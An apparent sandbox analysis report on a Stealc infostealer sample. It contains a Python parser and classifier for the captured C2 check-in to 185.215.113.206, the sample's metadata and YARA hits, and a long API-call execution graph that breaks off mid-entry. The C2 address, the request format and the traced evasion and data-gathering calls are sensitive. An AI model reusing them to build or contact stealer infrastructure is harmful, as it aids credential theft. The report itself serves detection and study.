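The exchange above is the whole observable C2 protocol in this run: an empty GET /, then a multipart POST to a 16-hex-digit .php path with hwid and build fields, answered with a base64 body. The following is an added example, not code from the report or from the sample: it reconstructs the captured request and reply inline (from the Data Raw bytes printed above, CRLF restored), parses the multipart body, decodes the reply, and applies a classification rule derived from this one capture and the Suricata signature name. The rule is a heuristic assumption, not a definition of the Stealc protocol.

```python
"""Parse and classify the Stealc C2 check-in captured in this report.

The request body and the 8-byte reply are constructed from the "Data Raw"
dump on this page; everything else (field names, path pattern, rule) is an
assumption made for this example.
"""
import base64
import re
from typing import Dict, Optional

BOUNDARY = "----GHDAAKJEGCFCAKEBKJJE"     # from the captured Content-Type header
C2_PATH = "/e2b1563c6670f193.php"         # from the captured request line
C2_HOST = "185.215.113.206"

POST_HEADERS = {
    "Content-Type": f"multipart/form-data; boundary={BOUNDARY}",
    "Host": C2_HOST,
    "Content-Length": "210",
}
# The multipart body as sent; 210 bytes once CRLFs are in place.
POST_BODY = (
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="hwid"\r\n\r\n'
    "4A5C57CE7A89514701825\r\n"
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="build"\r\n\r\n'
    "puma\r\n"
    f"--{BOUNDARY}--\r\n"
).encode()
C2_REPLY = bytes.fromhex("59 6d 78 76 59 32 73 3d")   # the reply's "Data Raw"

_PATH_RE = re.compile(r"^/[0-9a-f]{16}\.php$")       # assumption from this one path
_NAME_RE = re.compile(rb'name="([^"]*)"')


def parse_multipart(body: bytes, boundary: str) -> Dict[str, bytes]:
    """Minimal multipart/form-data parser: field name -> raw value bytes."""
    delimiter = b"--" + boundary.encode()
    fields: Dict[str, bytes] = {}
    for part in body.split(delimiter):
        part = part.strip(b"\r\n")
        if not part or part == b"--":          # preamble or the closing "--" marker
            continue
        head, _, value = part.partition(b"\r\n\r\n")
        m = _NAME_RE.search(head)
        if m:
            fields[m.group(1).decode()] = value.rstrip(b"\r\n")
    return fields


def boundary_of(content_type: str) -> Optional[str]:
    m = re.search(r"boundary=([^;\s]+)", content_type)
    return m.group(1) if m else None


def looks_like_stealc_checkin(method: str, path: str,
                              headers: Dict[str, str], body: bytes) -> bool:
    """POST to /<16 hex>.php whose multipart body has 'hwid' and 'build' fields,
    i.e. the shape seen in this capture. Heuristic: tune against real traffic."""
    if method != "POST" or not _PATH_RE.match(path):
        return False
    ctype = headers.get("Content-Type", "")
    boundary = boundary_of(ctype)
    if not ctype.startswith("multipart/form-data") or boundary is None:
        return False
    return {"hwid", "build"} <= set(parse_multipart(body, boundary))


def decode_reply(reply: bytes) -> str:
    """The C2 body is base64; here it decodes to 'block' and the session ends."""
    return base64.b64decode(reply, validate=True).decode()


def summarize_exchange() -> Dict[str, object]:
    fields = parse_multipart(POST_BODY, BOUNDARY)
    return {
        "host": C2_HOST,
        "path": C2_PATH,
        "hwid": fields["hwid"].decode(),
        "build": fields["build"].decode(),
        "body_len": len(POST_BODY),
        "reply": decode_reply(C2_REPLY),
        "is_checkin": looks_like_stealc_checkin("POST", C2_PATH, POST_HEADERS, POST_BODY),
    }


if __name__ == "__main__":
    for key, value in summarize_exchange().items():
        print(f"{key:>10}: {value}")
```

The body length check is worth keeping in a real detector: the restored CRLFs bring the body to exactly the 210 bytes the Content-Length header declares, which is how you confirm the reconstruction against the capture rather than against a guess.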



                                      Target ID:0
                                      Start time:23:55:04
                                      Start date:25/10/2024
                                      Path:C:\Users\user\Desktop\file.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\file.exe"
                                      Imagebase:0xa40000
                                      File size:1'834'496 bytes
                                      MD5 hash:3833A1B7C23D66EECEC6B16DDF5CF540
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2137808772.00000000015EE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2096593419.00000000053F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true


                                        Execution Graph

                                        Execution Coverage:7.8%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:10.1%
                                        Total number of Nodes:2000
                                        Total number of Limit Nodes:24
                                        execution_graph 13481 a569f0 13526 a42260 13481->13526 13505 a56a64 13506 a5a9b0 4 API calls 13505->13506 13507 a56a6b 13506->13507 13508 a5a9b0 4 API calls 13507->13508 13509 a56a72 13508->13509 13510 a5a9b0 4 API calls 13509->13510 13511 a56a79 13510->13511 13512 a5a9b0 4 API calls 13511->13512 13513 a56a80 13512->13513 13678 a5a8a0 13513->13678 13515 a56b0c 13682 a56920 GetSystemTime 13515->13682 13516 a56a89 13516->13515 13518 a56ac2 OpenEventA 13516->13518 13520 a56af5 CloseHandle Sleep 13518->13520 13521 a56ad9 13518->13521 13523 a56b0a 13520->13523 13525 a56ae1 CreateEventA 13521->13525 13523->13516 13525->13515 13879 a445c0 13526->13879 13528 a42274 13529 a445c0 2 API calls 13528->13529 13530 a4228d 13529->13530 13531 a445c0 2 API calls 13530->13531 13532 a422a6 13531->13532 13533 a445c0 2 API calls 13532->13533 13534 a422bf 13533->13534 13535 a445c0 2 API calls 13534->13535 13536 a422d8 13535->13536 13537 a445c0 2 API calls 13536->13537 13538 a422f1 13537->13538 13539 a445c0 2 API calls 13538->13539 13540 a4230a 13539->13540 13541 a445c0 2 API calls 13540->13541 13542 a42323 13541->13542 13543 a445c0 2 API calls 13542->13543 13544 a4233c 13543->13544 13545 a445c0 2 API calls 13544->13545 13546 a42355 13545->13546 13547 a445c0 2 API calls 13546->13547 13548 a4236e 13547->13548 13549 a445c0 2 API calls 13548->13549 13550 a42387 13549->13550 13551 a445c0 2 API calls 13550->13551 13552 a423a0 13551->13552 13553 a445c0 2 API calls 13552->13553 13554 a423b9 13553->13554 13555 a445c0 2 API calls 13554->13555 13556 a423d2 13555->13556 13557 a445c0 2 API calls 13556->13557 13558 a423eb 13557->13558 13559 a445c0 2 API calls 13558->13559 13560 a42404 13559->13560 13561 a445c0 2 API calls 13560->13561 13562 a4241d 13561->13562 13563 a445c0 2 API calls 13562->13563 13564 a42436 13563->13564 13565 a445c0 2 API calls 13564->13565 13566 a4244f 13565->13566 13567 a445c0 2 API calls 13566->13567 13568 a42468 13567->13568 13569 a445c0 
2 API calls 13568->13569 13570 a42481 13569->13570 13571 a445c0 2 API calls 13570->13571 13572 a4249a 13571->13572 13573 a445c0 2 API calls 13572->13573 13574 a424b3 13573->13574 13575 a445c0 2 API calls 13574->13575 13576 a424cc 13575->13576 13577 a445c0 2 API calls 13576->13577 13578 a424e5 13577->13578 13579 a445c0 2 API calls 13578->13579 13580 a424fe 13579->13580 13581 a445c0 2 API calls 13580->13581 13582 a42517 13581->13582 13583 a445c0 2 API calls 13582->13583 13584 a42530 13583->13584 13585 a445c0 2 API calls 13584->13585 13586 a42549 13585->13586 13587 a445c0 2 API calls 13586->13587 13588 a42562 13587->13588 13589 a445c0 2 API calls 13588->13589 13590 a4257b 13589->13590 13591 a445c0 2 API calls 13590->13591 13592 a42594 13591->13592 13593 a445c0 2 API calls 13592->13593 13594 a425ad 13593->13594 13595 a445c0 2 API calls 13594->13595 13596 a425c6 13595->13596 13597 a445c0 2 API calls 13596->13597 13598 a425df 13597->13598 13599 a445c0 2 API calls 13598->13599 13600 a425f8 13599->13600 13601 a445c0 2 API calls 13600->13601 13602 a42611 13601->13602 13603 a445c0 2 API calls 13602->13603 13604 a4262a 13603->13604 13605 a445c0 2 API calls 13604->13605 13606 a42643 13605->13606 13607 a445c0 2 API calls 13606->13607 13608 a4265c 13607->13608 13609 a445c0 2 API calls 13608->13609 13610 a42675 13609->13610 13611 a445c0 2 API calls 13610->13611 13612 a4268e 13611->13612 13613 a59860 13612->13613 13884 a59750 GetPEB 13613->13884 13615 a59868 13616 a59a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 13615->13616 13617 a5987a 13615->13617 13618 a59af4 GetProcAddress 13616->13618 13619 a59b0d 13616->13619 13620 a5988c 21 API calls 13617->13620 13618->13619 13621 a59b46 13619->13621 13622 a59b16 GetProcAddress GetProcAddress 13619->13622 13620->13616 13623 a59b4f GetProcAddress 13621->13623 13624 a59b68 13621->13624 13622->13621 13623->13624 13625 a59b71 GetProcAddress 13624->13625 13626 a59b89 13624->13626 13625->13626 13627 a56a00 13626->13627 
13628 a59b92 GetProcAddress GetProcAddress 13626->13628 13629 a5a740 13627->13629 13628->13627 13630 a5a750 13629->13630 13631 a56a0d 13630->13631 13632 a5a77e lstrcpy 13630->13632 13633 a411d0 13631->13633 13632->13631 13634 a411e8 13633->13634 13635 a41217 13634->13635 13636 a4120f ExitProcess 13634->13636 13637 a41160 GetSystemInfo 13635->13637 13638 a41184 13637->13638 13639 a4117c ExitProcess 13637->13639 13640 a41110 GetCurrentProcess VirtualAllocExNuma 13638->13640 13641 a41141 ExitProcess 13640->13641 13642 a41149 13640->13642 13885 a410a0 VirtualAlloc 13642->13885 13645 a41220 13889 a589b0 13645->13889 13648 a41249 __aulldiv 13649 a4129a 13648->13649 13650 a41292 ExitProcess 13648->13650 13651 a56770 GetUserDefaultLangID 13649->13651 13652 a567d3 13651->13652 13653 a56792 13651->13653 13659 a41190 13652->13659 13653->13652 13654 a567b7 ExitProcess 13653->13654 13655 a567c1 ExitProcess 13653->13655 13656 a567a3 ExitProcess 13653->13656 13657 a567ad ExitProcess 13653->13657 13658 a567cb ExitProcess 13653->13658 13658->13652 13660 a578e0 3 API calls 13659->13660 13661 a4119e 13660->13661 13662 a411cc 13661->13662 13663 a57850 3 API calls 13661->13663 13666 a57850 GetProcessHeap RtlAllocateHeap GetUserNameA 13662->13666 13664 a411b7 13663->13664 13664->13662 13665 a411c4 ExitProcess 13664->13665 13667 a56a30 13666->13667 13668 a578e0 GetProcessHeap RtlAllocateHeap GetComputerNameA 13667->13668 13669 a56a43 13668->13669 13670 a5a9b0 13669->13670 13891 a5a710 13670->13891 13672 a5a9c1 lstrlen 13673 a5a9e0 13672->13673 13674 a5aa18 13673->13674 13676 a5a9fa lstrcpy lstrcat 13673->13676 13892 a5a7a0 13674->13892 13676->13674 13677 a5aa24 13677->13505 13679 a5a8bb 13678->13679 13680 a5a90b 13679->13680 13681 a5a8f9 lstrcpy 13679->13681 13680->13516 13681->13680 13896 a56820 13682->13896 13684 a5698e 13685 a56998 sscanf 13684->13685 13925 a5a800 13685->13925 13687 a569aa SystemTimeToFileTime SystemTimeToFileTime 13688 a569e0 13687->13688 13689 a569ce 13687->13689 
13691 a55b10 13688->13691 13689->13688 13690 a569d8 ExitProcess 13689->13690 13692 a55b1d 13691->13692 13693 a5a740 lstrcpy 13692->13693 13694 a55b2e 13693->13694 13927 a5a820 lstrlen 13694->13927 13697 a5a820 2 API calls 13698 a55b64 13697->13698 13699 a5a820 2 API calls 13698->13699 13700 a55b74 13699->13700 13931 a56430 13700->13931 13703 a5a820 2 API calls 13704 a55b93 13703->13704 13705 a5a820 2 API calls 13704->13705 13706 a55ba0 13705->13706 13707 a5a820 2 API calls 13706->13707 13708 a55bad 13707->13708 13709 a5a820 2 API calls 13708->13709 13710 a55bf9 13709->13710 13940 a426a0 13710->13940 13718 a55cc3 13719 a56430 lstrcpy 13718->13719 13720 a55cd5 13719->13720 13721 a5a7a0 lstrcpy 13720->13721 13722 a55cf2 13721->13722 13723 a5a9b0 4 API calls 13722->13723 13724 a55d0a 13723->13724 13725 a5a8a0 lstrcpy 13724->13725 13726 a55d16 13725->13726 13727 a5a9b0 4 API calls 13726->13727 13728 a55d3a 13727->13728 13729 a5a8a0 lstrcpy 13728->13729 13730 a55d46 13729->13730 13731 a5a9b0 4 API calls 13730->13731 13732 a55d6a 13731->13732 13733 a5a8a0 lstrcpy 13732->13733 13734 a55d76 13733->13734 13735 a5a740 lstrcpy 13734->13735 13736 a55d9e 13735->13736 14666 a57500 GetWindowsDirectoryA 13736->14666 13739 a5a7a0 lstrcpy 13740 a55db8 13739->13740 14676 a44880 13740->14676 13742 a55dbe 14821 a517a0 13742->14821 13744 a55dc6 13745 a5a740 lstrcpy 13744->13745 13746 a55de9 13745->13746 13747 a41590 lstrcpy 13746->13747 13748 a55dfd 13747->13748 14837 a45960 13748->14837 13750 a55e03 14981 a51050 13750->14981 13752 a55e0e 13753 a5a740 lstrcpy 13752->13753 13754 a55e32 13753->13754 13755 a41590 lstrcpy 13754->13755 13756 a55e46 13755->13756 13757 a45960 34 API calls 13756->13757 13758 a55e4c 13757->13758 14985 a50d90 13758->14985 13760 a55e57 13761 a5a740 lstrcpy 13760->13761 13762 a55e79 13761->13762 13763 a41590 lstrcpy 13762->13763 13764 a55e8d 13763->13764 13765 a45960 34 API calls 13764->13765 13766 a55e93 13765->13766 14992 a50f40 13766->14992 13768 a55e9e 13769 
a41590 lstrcpy 13768->13769 13770 a55eb5 13769->13770 14997 a51a10 13770->14997 13772 a55eba 13773 a5a740 lstrcpy 13772->13773 13774 a55ed6 13773->13774 15341 a44fb0 GetProcessHeap RtlAllocateHeap InternetOpenA 13774->15341 13776 a55edb 13777 a41590 lstrcpy 13776->13777 13778 a55f5b 13777->13778 15348 a50740 13778->15348 13780 a55f60 13781 a5a740 lstrcpy 13780->13781 13782 a55f86 13781->13782 13783 a41590 lstrcpy 13782->13783 13784 a55f9a 13783->13784 13785 a45960 34 API calls 13784->13785 13880 a445d1 RtlAllocateHeap 13879->13880 13883 a44621 VirtualProtect 13880->13883 13883->13528 13884->13615 13886 a410c2 codecvt 13885->13886 13887 a410fd 13886->13887 13888 a410e2 VirtualFree 13886->13888 13887->13645 13888->13887 13890 a41233 GlobalMemoryStatusEx 13889->13890 13890->13648 13891->13672 13893 a5a7c2 13892->13893 13894 a5a7ec 13893->13894 13895 a5a7da lstrcpy 13893->13895 13894->13677 13895->13894 13897 a5a740 lstrcpy 13896->13897 13898 a56833 13897->13898 13899 a5a9b0 4 API calls 13898->13899 13900 a56845 13899->13900 13901 a5a8a0 lstrcpy 13900->13901 13902 a5684e 13901->13902 13903 a5a9b0 4 API calls 13902->13903 13904 a56867 13903->13904 13905 a5a8a0 lstrcpy 13904->13905 13906 a56870 13905->13906 13907 a5a9b0 4 API calls 13906->13907 13908 a5688a 13907->13908 13909 a5a8a0 lstrcpy 13908->13909 13910 a56893 13909->13910 13911 a5a9b0 4 API calls 13910->13911 13912 a568ac 13911->13912 13913 a5a8a0 lstrcpy 13912->13913 13914 a568b5 13913->13914 13915 a5a9b0 4 API calls 13914->13915 13916 a568cf 13915->13916 13917 a5a8a0 lstrcpy 13916->13917 13918 a568d8 13917->13918 13919 a5a9b0 4 API calls 13918->13919 13920 a568f3 13919->13920 13921 a5a8a0 lstrcpy 13920->13921 13922 a568fc 13921->13922 13923 a5a7a0 lstrcpy 13922->13923 13924 a56910 13923->13924 13924->13684 13926 a5a812 13925->13926 13926->13687 13928 a5a83f 13927->13928 13929 a55b54 13928->13929 13930 a5a87b lstrcpy 13928->13930 13929->13697 13930->13929 13932 a5a8a0 lstrcpy 13931->13932 13933 a56443 
13932->13933 13934 a5a8a0 lstrcpy 13933->13934 13935 a56455 13934->13935 13936 a5a8a0 lstrcpy 13935->13936 13937 a56467 13936->13937 13938 a5a8a0 lstrcpy 13937->13938 13939 a55b86 13938->13939 13939->13703 13941 a445c0 2 API calls 13940->13941 13942 a426b4 13941->13942 13943 a445c0 2 API calls 13942->13943 13944 a426d7 13943->13944 13945 a445c0 2 API calls 13944->13945 13946 a426f0 13945->13946 13947 a445c0 2 API calls 13946->13947 13948 a42709 13947->13948 13949 a445c0 2 API calls 13948->13949 13950 a42736 13949->13950 13951 a445c0 2 API calls 13950->13951 13952 a4274f 13951->13952 13953 a445c0 2 API calls 13952->13953 13954 a42768 13953->13954 13955 a445c0 2 API calls 13954->13955 13956 a42795 13955->13956 13957 a445c0 2 API calls 13956->13957 13958 a427ae 13957->13958 13959 a445c0 2 API calls 13958->13959 13960 a427c7 13959->13960 13961 a445c0 2 API calls 13960->13961 13962 a427e0 13961->13962 13963 a445c0 2 API calls 13962->13963 13964 a427f9 13963->13964 13965 a445c0 2 API calls 13964->13965 13966 a42812 13965->13966 13967 a445c0 2 API calls 13966->13967 13968 a4282b 13967->13968 13969 a445c0 2 API calls 13968->13969 13970 a42844 13969->13970 13971 a445c0 2 API calls 13970->13971 13972 a4285d 13971->13972 13973 a445c0 2 API calls 13972->13973 13974 a42876 13973->13974 13975 a445c0 2 API calls 13974->13975 13976 a4288f 13975->13976 13977 a445c0 2 API calls 13976->13977 13978 a428a8 13977->13978 13979 a445c0 2 API calls 13978->13979 13980 a428c1 13979->13980 13981 a445c0 2 API calls 13980->13981 13982 a428da 13981->13982 13983 a445c0 2 API calls 13982->13983 13984 a428f3 13983->13984 13985 a445c0 2 API calls 13984->13985 13986 a4290c 13985->13986 13987 a445c0 2 API calls 13986->13987 13988 a42925 13987->13988 13989 a445c0 2 API calls 13988->13989 13990 a4293e 13989->13990 13991 a445c0 2 API calls 13990->13991 13992 a42957 13991->13992 13993 a445c0 2 API calls 13992->13993 13994 a42970 13993->13994 13995 a445c0 2 API calls 13994->13995 13996 a42989 13995->13996 
13997 a445c0 2 API calls 13996->13997 13998 a429a2 13997->13998 13999 a445c0 2 API calls 13998->13999 14000 a429bb 13999->14000 14001 a445c0 2 API calls 14000->14001 14002 a429d4 14001->14002 14003 a445c0 2 API calls 14002->14003 14004 a429ed 14003->14004 14005 a445c0 2 API calls 14004->14005 14006 a42a06 14005->14006 14007 a445c0 2 API calls 14006->14007 14008 a42a1f 14007->14008 14009 a445c0 2 API calls 14008->14009 14010 a42a38 14009->14010 14011 a445c0 2 API calls 14010->14011 14012 a42a51 14011->14012 14013 a445c0 2 API calls 14012->14013 14014 a42a6a 14013->14014 14015 a445c0 2 API calls 14014->14015 14016 a42a83 14015->14016 14017 a445c0 2 API calls 14016->14017 14018 a42a9c 14017->14018 14019 a445c0 2 API calls 14018->14019 14020 a42ab5 14019->14020 14021 a445c0 2 API calls 14020->14021 14022 a42ace 14021->14022 14023 a445c0 2 API calls 14022->14023 14024 a42ae7 14023->14024 14025 a445c0 2 API calls 14024->14025 14026 a42b00 14025->14026 14027 a445c0 2 API calls 14026->14027 14028 a42b19 14027->14028 14029 a445c0 2 API calls 14028->14029 14030 a42b32 14029->14030 14031 a445c0 2 API calls 14030->14031 14032 a42b4b 14031->14032 14033 a445c0 2 API calls 14032->14033 14034 a42b64 14033->14034 14035 a445c0 2 API calls 14034->14035 14036 a42b7d 14035->14036 14037 a445c0 2 API calls 14036->14037 14038 a42b96 14037->14038 14039 a445c0 2 API calls 14038->14039 14040 a42baf 14039->14040 14041 a445c0 2 API calls 14040->14041 14042 a42bc8 14041->14042 14043 a445c0 2 API calls 14042->14043 14044 a42be1 14043->14044 14045 a445c0 2 API calls 14044->14045 14046 a42bfa 14045->14046 14047 a445c0 2 API calls 14046->14047 14048 a42c13 14047->14048 14049 a445c0 2 API calls 14048->14049 14050 a42c2c 14049->14050 14051 a445c0 2 API calls 14050->14051 14052 a42c45 14051->14052 14053 a445c0 2 API calls 14052->14053 14054 a42c5e 14053->14054 14055 a445c0 2 API calls 14054->14055 14056 a42c77 14055->14056 14057 a445c0 2 API calls 14056->14057 14058 a42c90 14057->14058 14059 a445c0 2 
API calls 14058->14059 14060 a42ca9 14059->14060 14061 a445c0 2 API calls 14060->14061 14062 a42cc2 14061->14062 14063 a445c0 2 API calls 14062->14063 14064 a42cdb 14063->14064 14065 a445c0 2 API calls 14064->14065 14066 a42cf4 14065->14066 14067 a445c0 2 API calls 14066->14067 14068 a42d0d 14067->14068 14069 a445c0 2 API calls 14068->14069 14070 a42d26 14069->14070 14071 a445c0 2 API calls 14070->14071 14072 a42d3f 14071->14072 14073 a445c0 2 API calls 14072->14073 14074 a42d58 14073->14074 14075 a445c0 2 API calls 14074->14075 14076 a42d71 14075->14076 14077 a445c0 2 API calls 14076->14077 14078 a42d8a 14077->14078 14079 a445c0 2 API calls 14078->14079 14080 a42da3 14079->14080 14081 a445c0 2 API calls 14080->14081 14082 a42dbc 14081->14082 14083 a445c0 2 API calls 14082->14083 14084 a42dd5 14083->14084 14085 a445c0 2 API calls 14084->14085 14086 a42dee 14085->14086 14087 a445c0 2 API calls 14086->14087 14088 a42e07 14087->14088 14089 a445c0 2 API calls 14088->14089 14090 a42e20 14089->14090 14091 a445c0 2 API calls 14090->14091 14092 a42e39 14091->14092 14093 a445c0 2 API calls 14092->14093 14094 a42e52 14093->14094 14095 a445c0 2 API calls 14094->14095 14096 a42e6b 14095->14096 14097 a445c0 2 API calls 14096->14097 14098 a42e84 14097->14098 14099 a445c0 2 API calls 14098->14099 14100 a42e9d 14099->14100 14101 a445c0 2 API calls 14100->14101 14102 a42eb6 14101->14102 14103 a445c0 2 API calls 14102->14103 14104 a42ecf 14103->14104 14105 a445c0 2 API calls 14104->14105 14106 a42ee8 14105->14106 14107 a445c0 2 API calls 14106->14107 14108 a42f01 14107->14108 14109 a445c0 2 API calls 14108->14109 14110 a42f1a 14109->14110 14111 a445c0 2 API calls 14110->14111 14112 a42f33 14111->14112 14113 a445c0 2 API calls 14112->14113 14114 a42f4c 14113->14114 14115 a445c0 2 API calls 14114->14115 14116 a42f65 14115->14116 14117 a445c0 2 API calls 14116->14117 14118 a42f7e 14117->14118 14119 a445c0 2 API calls 14118->14119 14120 a42f97 14119->14120 14121 a445c0 2 API calls 
14120->14121 14122 a42fb0 14121->14122 14123 a445c0 2 API calls 14122->14123 14124 a42fc9 14123->14124 14125 a445c0 2 API calls 14124->14125 14126 a42fe2 14125->14126 14127 a445c0 2 API calls 14126->14127 14128 a42ffb 14127->14128 14129 a445c0 2 API calls 14128->14129 14130 a43014 14129->14130 14131 a445c0 2 API calls 14130->14131 14132 a4302d 14131->14132 14133 a445c0 2 API calls 14132->14133 14134 a43046 14133->14134 14135 a445c0 2 API calls 14134->14135 14136 a4305f 14135->14136 14137 a445c0 2 API calls 14136->14137 14138 a43078 14137->14138 14139 a445c0 2 API calls 14138->14139 14140 a43091 14139->14140 14141 a445c0 2 API calls 14140->14141 14142 a430aa 14141->14142 14143 a445c0 2 API calls 14142->14143 14144 a430c3 14143->14144 14145 a445c0 2 API calls 14144->14145 14146 a430dc 14145->14146 14147 a445c0 2 API calls 14146->14147 14148 a430f5 14147->14148 14149 a445c0 2 API calls 14148->14149 14150 a4310e 14149->14150 14151 a445c0 2 API calls 14150->14151 14152 a43127 14151->14152 14153 a445c0 2 API calls 14152->14153 14154 a43140 14153->14154 14155 a445c0 2 API calls 14154->14155 14156 a43159 14155->14156 14157 a445c0 2 API calls 14156->14157 14158 a43172 14157->14158 14159 a445c0 2 API calls 14158->14159 14160 a4318b 14159->14160 14161 a445c0 2 API calls 14160->14161 14162 a431a4 14161->14162 14163 a445c0 2 API calls 14162->14163 14164 a431bd 14163->14164 14165 a445c0 2 API calls 14164->14165 14166 a431d6 14165->14166 14167 a445c0 2 API calls 14166->14167 14168 a431ef 14167->14168 14169 a445c0 2 API calls 14168->14169 14170 a43208 14169->14170 14171 a445c0 2 API calls 14170->14171 14172 a43221 14171->14172 14173 a445c0 2 API calls 14172->14173 14174 a4323a 14173->14174 14175 a445c0 2 API calls 14174->14175 14176 a43253 14175->14176 14177 a445c0 2 API calls 14176->14177 14178 a4326c 14177->14178 14179 a445c0 2 API calls 14178->14179 14180 a43285 14179->14180 14181 a445c0 2 API calls 14180->14181 14182 a4329e 14181->14182 14183 a445c0 2 API calls 14182->14183 
15837 a5a740 lstrcpy 15836->15837 15838 a5835c RegOpenKeyExA 15837->15838 15839 a583d0 15838->15839 15840 a583ae 15838->15840 15842 a58613 RegCloseKey 15839->15842 15843 a583f8 RegEnumKeyExA 15839->15843 15841 a5a7a0 lstrcpy 15840->15841 15852 a583bd 15841->15852 15846 a5a7a0 lstrcpy 15842->15846 15844 a5843f wsprintfA RegOpenKeyExA 15843->15844 15845 a5860e 15843->15845 15847 a58485 RegCloseKey RegCloseKey 15844->15847 15848 a584c1 RegQueryValueExA 15844->15848 15845->15842 15846->15852 15849 a5a7a0 lstrcpy 15847->15849 15850 a58601 RegCloseKey 15848->15850 15851 a584fa lstrlen 15848->15851 15849->15852 15850->15845 15851->15850 15853 a58510 15851->15853 15852->15296 15854 a5a9b0 4 API calls 15853->15854 15855 a58527 15854->15855 15856 a5a8a0 lstrcpy 15855->15856 15857 a58533 15856->15857 15858 a5a9b0 4 API calls 15857->15858 15859 a58557 15858->15859 15860 a5a8a0 lstrcpy 15859->15860 15861 a58563 15860->15861 15862 a5856e RegQueryValueExA 15861->15862 15862->15850 15863 a585a3 15862->15863 15864 a5a9b0 4 API calls 15863->15864 15865 a585ba 15864->15865 15866 a5a8a0 lstrcpy 15865->15866 15867 a585c6 15866->15867 15868 a5a9b0 4 API calls 15867->15868 15869 a585ea 15868->15869 15870 a5a8a0 lstrcpy 15869->15870 15871 a585f6 15870->15871 15871->15850 15873 a5a740 lstrcpy 15872->15873 15874 a586bc CreateToolhelp32Snapshot Process32First 15873->15874 15875 a5875d CloseHandle 15874->15875 15876 a586e8 Process32Next 15874->15876 15877 a5a7a0 lstrcpy 15875->15877 15876->15875 15881 a586fd 15876->15881 15879 a58776 15877->15879 15878 a5a8a0 lstrcpy 15878->15881 15879->15328 15880 a5a9b0 lstrcpy lstrlen lstrcpy lstrcat 15880->15881 15881->15876 15881->15878 15881->15880 15883 a5a7a0 lstrcpy 15882->15883 15884 a551b5 15883->15884 15885 a41590 lstrcpy 15884->15885 15886 a551c6 15885->15886 15901 a45100 15886->15901 15888 a551cf 15888->15340 15892 a57720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15889->15892 15891 a576b9 15891->15764 15891->15765 15893 a57765 
RegQueryValueExA 15892->15893 15894 a57780 RegCloseKey 15892->15894 15893->15894 15895 a57793 15894->15895 15895->15891 15896->15778 15898 a58a0c 15897->15898 15899 a589f9 GetProcessHeap HeapFree 15897->15899 15898->15814 15899->15898 15900->15814 15902 a5a7a0 lstrcpy 15901->15902 15903 a45119 15902->15903 15904 a447b0 2 API calls 15903->15904 15905 a45125 15904->15905 16061 a58ea0 15905->16061 15907 a45184 15908 a45192 lstrlen 15907->15908 15909 a451a5 15908->15909 15910 a58ea0 4 API calls 15909->15910 15911 a451b6 15910->15911 15912 a5a740 lstrcpy 15911->15912 15913 a451c9 15912->15913 15914 a5a740 lstrcpy 15913->15914 15915 a451d6 15914->15915 15916 a5a740 lstrcpy 15915->15916 15917 a451e3 15916->15917 15918 a5a740 lstrcpy 15917->15918 15919 a451f0 15918->15919 15920 a5a740 lstrcpy 15919->15920 15921 a451fd InternetOpenA StrCmpCA 15920->15921 15922 a4522f 15921->15922 15923 a458c4 InternetCloseHandle 15922->15923 15924 a58b60 3 API calls 15922->15924 15930 a458d9 codecvt 15923->15930 15925 a4524e 15924->15925 15926 a5a920 3 API calls 15925->15926 15927 a45261 15926->15927 15928 a5a8a0 lstrcpy 15927->15928 15929 a4526a 15928->15929 15931 a5a9b0 4 API calls 15929->15931 15934 a5a7a0 lstrcpy 15930->15934 15932 a452ab 15931->15932 15933 a5a920 3 API calls 15932->15933 15935 a452b2 15933->15935 15941 a45913 15934->15941 15936 a5a9b0 4 API calls 15935->15936 15937 a452b9 15936->15937 15938 a5a8a0 lstrcpy 15937->15938 15939 a452c2 15938->15939 15940 a5a9b0 4 API calls 15939->15940 15942 a45303 15940->15942 15941->15888 15943 a5a920 3 API calls 15942->15943 15944 a4530a 15943->15944 15945 a5a8a0 lstrcpy 15944->15945 15946 a45313 15945->15946 15947 a45329 InternetConnectA 15946->15947 15947->15923 15948 a45359 HttpOpenRequestA 15947->15948 15950 a458b7 InternetCloseHandle 15948->15950 15951 a453b7 15948->15951 15950->15923 15952 a5a9b0 4 API calls 15951->15952 15953 a453cb 15952->15953 15954 a5a8a0 lstrcpy 15953->15954 15955 a453d4 15954->15955 15956 a5a920 3 API calls 
15955->15956 15957 a453f2 15956->15957 15958 a5a8a0 lstrcpy 15957->15958 15959 a453fb 15958->15959 15960 a5a9b0 4 API calls 15959->15960 15961 a4541a 15960->15961 15962 a5a8a0 lstrcpy 15961->15962 15963 a45423 15962->15963 15964 a5a9b0 4 API calls 15963->15964 15965 a45444 15964->15965 15966 a5a8a0 lstrcpy 15965->15966 15967 a4544d 15966->15967 15968 a5a9b0 4 API calls 15967->15968 15969 a4546e 15968->15969 15970 a5a8a0 lstrcpy 15969->15970 16062 a58ead CryptBinaryToStringA 16061->16062 16063 a58ea9 16061->16063 16062->16063 16064 a58ece GetProcessHeap RtlAllocateHeap 16062->16064 16063->15907 16064->16063 16065 a58ef4 codecvt 16064->16065 16066 a58f05 CryptBinaryToStringA 16065->16066 16066->16063 16070->15343 16313 a49880 16071->16313 16073 a498e1 16073->15350 16075 a5a740 lstrcpy 16074->16075 16248 a5a740 lstrcpy 16247->16248 16249 a50266 16248->16249 16250 a58de0 2 API calls 16249->16250 16251 a5027b 16250->16251 16252 a5a920 3 API calls 16251->16252 16253 a5028b 16252->16253 16254 a5a8a0 lstrcpy 16253->16254 16255 a50294 16254->16255 16256 a5a9b0 4 API calls 16255->16256 16257 a502b8 16256->16257 16314 a4988e 16313->16314 16317 a46fb0 16314->16317 16316 a498ad codecvt 16316->16073 16320 a46d40 16317->16320 16321 